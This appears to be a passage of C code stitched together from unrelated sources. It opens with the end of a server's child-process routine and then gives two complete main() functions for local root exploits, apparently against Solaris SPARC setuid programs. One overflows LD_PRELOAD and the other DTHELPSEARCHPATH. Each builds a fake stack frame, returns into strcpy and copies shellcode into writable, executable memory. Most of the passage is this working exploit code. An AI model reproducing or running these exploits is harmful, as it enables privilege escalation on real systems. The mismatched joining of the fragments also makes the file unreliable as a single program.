fprintf(stderr, "start_child(%s port %d from %s)\n", proto, local_port,
#ifdef CONFIG_IPV6
ipv6 ? inet_ntop(AF_INET6, &remote->sin6.sin6_addr, buf, sizeof(buf)) :
#endif
inet_ntoa(remote->sin.sin_addr));
{
int i;
for (i = 0; env_pointers[i]; i++) {
fprintf(stderr, "ENV[%d]: %s\n", i, env_pointers[i]);
}
}
#endif
pid = vfork();
if (pid == 0) {
if (fd != 0)
dup2(fd, 0);
if (fd != 1)
dup2(fd, 1);
#if 1
/* Don't redirect stderr to stdout */
if (fd != 2)
dup2(fd, 2);
#endif
if (fd > 2)
close(fd);
close_all_fds(2);
/* There is no execvpe, so we kludge it */
environ = env_pointers;
execvp(p->args[0], p->args);
fprintf(stderr, "execve failed!\n");
_exit(0);
}
return(pid);
}
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], ff[FFSIZE];
char platform[256], release[256];
int i, offset, ff_addr, sc_addr, str_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy");
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "LD_PRELOAD=/", 12);
buf[sizeof(buf) - 2] = '/';
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
str_addr = add_env(sc);
add_env("bar");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ff_addr = sb - offset + arg_len;
sc_addr += ff_addr;
str_addr += ff_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* fill the evil buffer */
for (i = 12 + ALIGN; i < 1296; i += 4)
set_val(buf, i, str_addr); /* must be a valid string */
/* to avoid distance bruteforcing */
for (i = 1296 + ALIGN; i < BUFSIZE - 12; i += 4) {
set_val(buf, i, ff_addr);
set_val(buf, i += 4, ret - 4); /* strcpy(), after the save */
}
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using string address\t: 0x%p\n", (void *)str_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE], ff[FFSIZE];
char platform[256], release[256], display[256];
int i, offset, ff_addr, sc_addr, var1_addr, var2_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "DTHELPSEARCHPATH=", 17);
/* prepare the evil env vars */
memset(var1, 'B', sizeof(var1));
var1[sizeof(var1) - 1] = 0x0;
memset(var2, 'C', sizeof(var2));
var2[sizeof(var2) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
var1_addr = add_env(sc);
var2_addr = add_env(var1);
add_env(var2);
add_env(display);
add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin");
add_env("HOME=/tmp");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ff_addr = sb - offset + arg_len;
sc_addr += ff_addr;
var1_addr += ff_addr;
var2_addr += ff_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* fill the evil buffer */
for (i = 17; i < BUFSIZE - 76; i += 4)
set_val(buf, i, var1_addr - 5000);
/* apparently, we don't need to bruteforce */
set_val(buf, i, ff_addr);
set_val(buf, i += 4, ret - 4); /* strcpy(), after the save */
/* fill the evil env vars */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var1, i, var2_addr - 500);
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var2, i, ret - 8); /* ret, before strcpy() */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr);
fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
